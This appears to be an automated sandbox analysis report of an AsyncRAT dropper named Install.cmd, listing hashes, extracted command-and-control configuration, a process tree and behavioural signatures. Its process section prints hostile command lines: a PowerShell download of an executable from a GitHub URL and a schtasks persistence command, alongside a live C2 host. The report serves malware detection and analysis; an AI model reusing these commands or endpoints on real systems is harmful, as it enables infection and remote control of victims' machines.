Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
14-07-2024 23:31
Behavioral task
behavioral1
Sample
Install.cmd
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Install.cmd
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
Loader.exe
Resource
win7-20240704-en
General
-
Target
Install.cmd
-
Size
407B
-
MD5
d605e519c8fb10ecc49055af63c0f213
-
SHA1
a69b61879040aa541258035461260159ea51369a
-
SHA256
1452be84cfc1ea5aee5db2011fe8e2a5b72ff2fe637b77696d720734f58eac89
-
SHA512
304e8825d0afa6f7235859bb2083d728510d48806b06214225978592e8c4f8d065e1bcf3ca9eb39d4312b762a83e1054237d11cecbb3347ef4868bb4574b0e2b
Malware Config
Extracted
asyncrat
Default
anyone-blogging.gl.at.ply.gg:22284
-
delay
1
-
install
true
-
install_file
Windows.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x00070000000234b2-23.dat family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4560 powershell.exe 4 4560 powershell.exe -
pid Process 4560 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 3392 Windows.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 raw.githubusercontent.com 4 raw.githubusercontent.com -
Delays execution with timeout.exe 1 IoCs
pid Process 2920 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3000 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 4560 powershell.exe 4560 powershell.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe 3808 Loader.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 3808 Loader.exe Token: SeDebugPrivilege 3808 Loader.exe Token: SeDebugPrivilege 3392 Windows.exe Token: SeDebugPrivilege 3392 Windows.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 424 wrote to memory of 3808 424 cmd.exe 84 PID 424 wrote to memory of 3808 424 cmd.exe 84 PID 424 wrote to memory of 4560 424 cmd.exe 85 PID 424 wrote to memory of 4560 424 cmd.exe 85 PID 3808 wrote to memory of 2844 3808 Loader.exe 89 PID 3808 wrote to memory of 2844 3808 Loader.exe 89 PID 3808 wrote to memory of 3128 3808 Loader.exe 90 PID 3808 wrote to memory of 3128 3808 Loader.exe 90 PID 3128 wrote to memory of 2920 3128 cmd.exe 93 PID 3128 wrote to memory of 2920 3128 cmd.exe 93 PID 2844 wrote to memory of 3000 2844 cmd.exe 94 PID 2844 wrote to memory of 3000 2844 cmd.exe 94 PID 3128 wrote to memory of 3392 3128 cmd.exe 95 PID 3128 wrote to memory of 3392 3128 cmd.exe 95 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Install.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:3000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDFE0.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:2920
-
-
C:\Users\Admin\AppData\Roaming\Windows.exe"C:\Users\Admin\AppData\Roaming\Windows.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C ""Invoke-WebRequest -Uri 'https://github.com/Espiny/test/raw/main/MainDab.exe' -OutFile '\Users\Admin\AppData\Local\Temp\MainDab.exe'""2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151B
MD5797a97b428eccb57998c64360974ce5e
SHA150e6fb52a350b1c9d07835988424676d473acc7a
SHA25651cc574c15d14ba7f8ebd975c2745bdae0a504fcea6e5327c5e8170fb05b55f6
SHA5127642f3393cdfcec686600364e7deead338cbadfa23ff478c5970a7aab017513eae06a7b87c15fe66793aa312f37b7c8cf7d36c0691642af492ec8cef0f7c5715
-
Filesize
63KB
MD5004ba87604ac07c77d161b96bfd97a34
SHA18f089b87f831946c617af9702ba79d20ddaf7394
SHA256bfbef5852faa1e2de88f380c620af93eb08114363c1d72d74d5809e7ff70f881
SHA512322a6fc44d0390ad55a7bf0cfe268814e00df2e757a8088d11d7addd9d2b089e4c62d4c955f2272b7ec50033e68a59f72778912cbae125e01c5b74c1b2909b8a